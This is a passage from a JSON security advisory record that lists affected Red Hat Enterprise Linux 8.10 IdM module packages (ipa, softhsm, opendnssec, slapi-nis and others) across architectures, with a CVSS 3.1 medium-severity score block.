"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
